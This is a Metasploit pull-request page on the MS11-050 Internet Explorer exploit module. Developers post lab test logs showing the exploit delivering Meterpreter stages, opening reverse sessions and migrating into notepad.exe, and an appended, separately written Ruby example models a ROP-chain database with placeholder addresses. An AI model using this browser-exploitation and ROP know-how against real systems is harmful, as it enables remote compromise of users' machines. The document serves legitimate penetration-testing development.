Use RopDb in MS11-050, and correct autopwninfo #866

Status: Merged (1 commit, Oct 6, 2012)

Conversation

@wchen-r7 (Contributor) commented Oct 6, 2012:

Tested in IE7+Win XP, IE8+Win XP, IE8+Win7:

msf  exploit(ms11_050_mshtml_cobjectelement) > [*]  Local IP: http://10.0.1.3:8080/YgNLSNzn5qi3YO
[*] Server started.
[*] 10.0.1.6         ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.6:1044) at 2012-10-06 01:39:09 -0500
[*] Session ID 3 (10.0.1.3:4444 -> 10.0.1.6:1044) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2872)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3188
[+] Successfully migrated to process


msf  exploit(ms11_050_mshtml_cobjectelement) > [*]  Local IP: http://10.0.1.3:8080/agNoigHh53i8Rzg
[*] Server started.
[*] 10.0.1.6         ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on XP SP3)...
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.6:1231) at 2012-10-06 01:17:53 -0500
[*] Session ID 2 (10.0.1.3:4444 -> 10.0.1.6:1231) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1676
[+] Successfully migrated to process


msf  exploit(ms11_050_mshtml_cobjectelement) >
[*] 10.0.1.7         ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on Windows 7)...
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 4 opened (10.0.1.3:4444 -> 10.0.1.7:49159) at 2012-10-06 01:44:05 -0500
[*] Session ID 4 (10.0.1.3:4444 -> 10.0.1.7:49159) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4064
[+] Successfully migrated to process

@jvazquez-r7 (Contributor):

Eyeballed, looks good, and tested on Windows XP SP3 with IE8 and Windows 7 SP1 with IE8. In both cases the exploit ran successfully:

msf  exploit(ms11_050_mshtml_cobjectelement) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/x3EGTYN
[*]  Local IP: http://192.168.1.128:8080/x3EGTYN
[*] Server started.
msf  exploit(ms11_050_mshtml_cobjectelement) > [*] 192.168.1.152    ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on XP SP3)...
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.152:2086) at 2012-10-06 14:07:01 +0200
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.152:2086) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1928)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 392
[+] Successfully migrated to process 
msf  exploit(ms11_050_mshtml_cobjectelement) > [*] 192.168.1.152 - Meterpreter session 1 closed.  Reason: Died
[*] 192.168.1.128    ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on Windows 7)...
[*] Sending stage (752128 bytes) to 192.168.1.128
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.128:56513) at 2012-10-06 14:08:46 +0200
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.128:56513) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1708)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2524
[+] Successfully migrated to process 

Merging!

@jvazquez-r7 jvazquez-r7 merged commit 94d5eb7 into rapid7:master Oct 6, 2012
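What "use RopDb" amounts to, shown as an added example that is not part of this PR and is not Metasploit's own Msf::Exploit::RopDb mixin: a small standalone Ruby model of a target-keyed ROP chain database. The exploit module names a DLL and a target OS (here 'msvcrt' with 'xp' or 'win7', matching the two target families exercised in the test logs above), gets back the chain with the payload appended, and is refused a chain for a combination the database does not know instead of silently sending a mismatched chain. The class name, the chain dwords and the size cap are all constructed for this example; the dwords are placeholders, not real msvcrt.dll gadget addresses.

```ruby
# Added example: a toy ROP-chain database, modelled on the idea of a shared
# chain store that browser exploits query by DLL name and target OS.
# Not Metasploit's RopDb mixin; all addresses below are constructed placeholders.

class ToyRopDb
  # dll name -> target label -> ordered 32-bit values (gadget addresses and
  # inline arguments) in the order they are laid out on the stack/heap.
  CHAINS = {
    'msvcrt' => {
      'xp'   => [0x77c1e844, 0x77c127e5, 0xffffffff, 0x77c2e5c0, 0x77c1e3f6],
      'win7' => [0x77bc5f00, 0x77bd0a21, 0x00000040, 0x77bee7a0, 0x77bc6112],
    },
  }.freeze

  # Constructed cap: the sprayed block the chain + payload must fit into.
  MAX_TOTAL = 0x1000

  # Returns chain bytes (little-endian dwords) followed by the payload bytes.
  # Raises ArgumentError for an unknown DLL, an unknown target, a malformed
  # chain entry, or a result too large for the spray block.
  def generate_rop_payload(name, payload, opts = {})
    target = opts.fetch('target') { raise ArgumentError, "target required" }
    chains = CHAINS[name] or raise ArgumentError, "no ROP database for #{name}"
    chain  = chains[target] or
      raise ArgumentError, "#{name} has no chain for target #{target}"

    unless chain.all? { |v| v.is_a?(Integer) && v.between?(0, 0xffffffff) }
      raise ArgumentError, "#{name}/#{target} contains a non-dword entry"
    end

    rop   = chain.pack('V*')          # 32-bit little-endian, as x86 expects
    total = rop + payload.b           # .b: keep everything as raw bytes
    if total.bytesize > MAX_TOTAL
      raise ArgumentError,
            "chain+payload is #{total.bytesize} bytes, cap is #{MAX_TOTAL}"
    end
    total
  end

  # Targets a database knows about, so a module can validate its own
  # target table against it at load time.
  def targets(name)
    CHAINS.fetch(name, {}).keys
  end
end

# Helper mirroring how a module would call the database for one target.
# Returns [chain_dword_count, total_size, first_dword].
def build_for(target, payload)
  out = ToyRopDb.new.generate_rop_payload('msvcrt', payload, 'target' => target)
  chain_len = (out.bytesize - payload.bytesize) / 4
  [chain_len, out.bytesize, out.unpack1('V')]
end

# Returns true when the database refuses an unknown target.
def refuses_unknown_target?(target)
  ToyRopDb.new.generate_rop_payload('msvcrt', "\xcc".b, 'target' => target)
  false
rescue ArgumentError
  true
end

if __FILE__ == $PROGRAM_NAME
  p build_for('xp', "\xcc".b * 4)
  p refuses_unknown_target?('win8')
end
```

The two things worth copying from the real design are the failure mode and the lookup key: a chain is selected by (DLL, target) rather than embedded in the module, and a combination with no chain is an error at generation time, not a crash in the victim's browser.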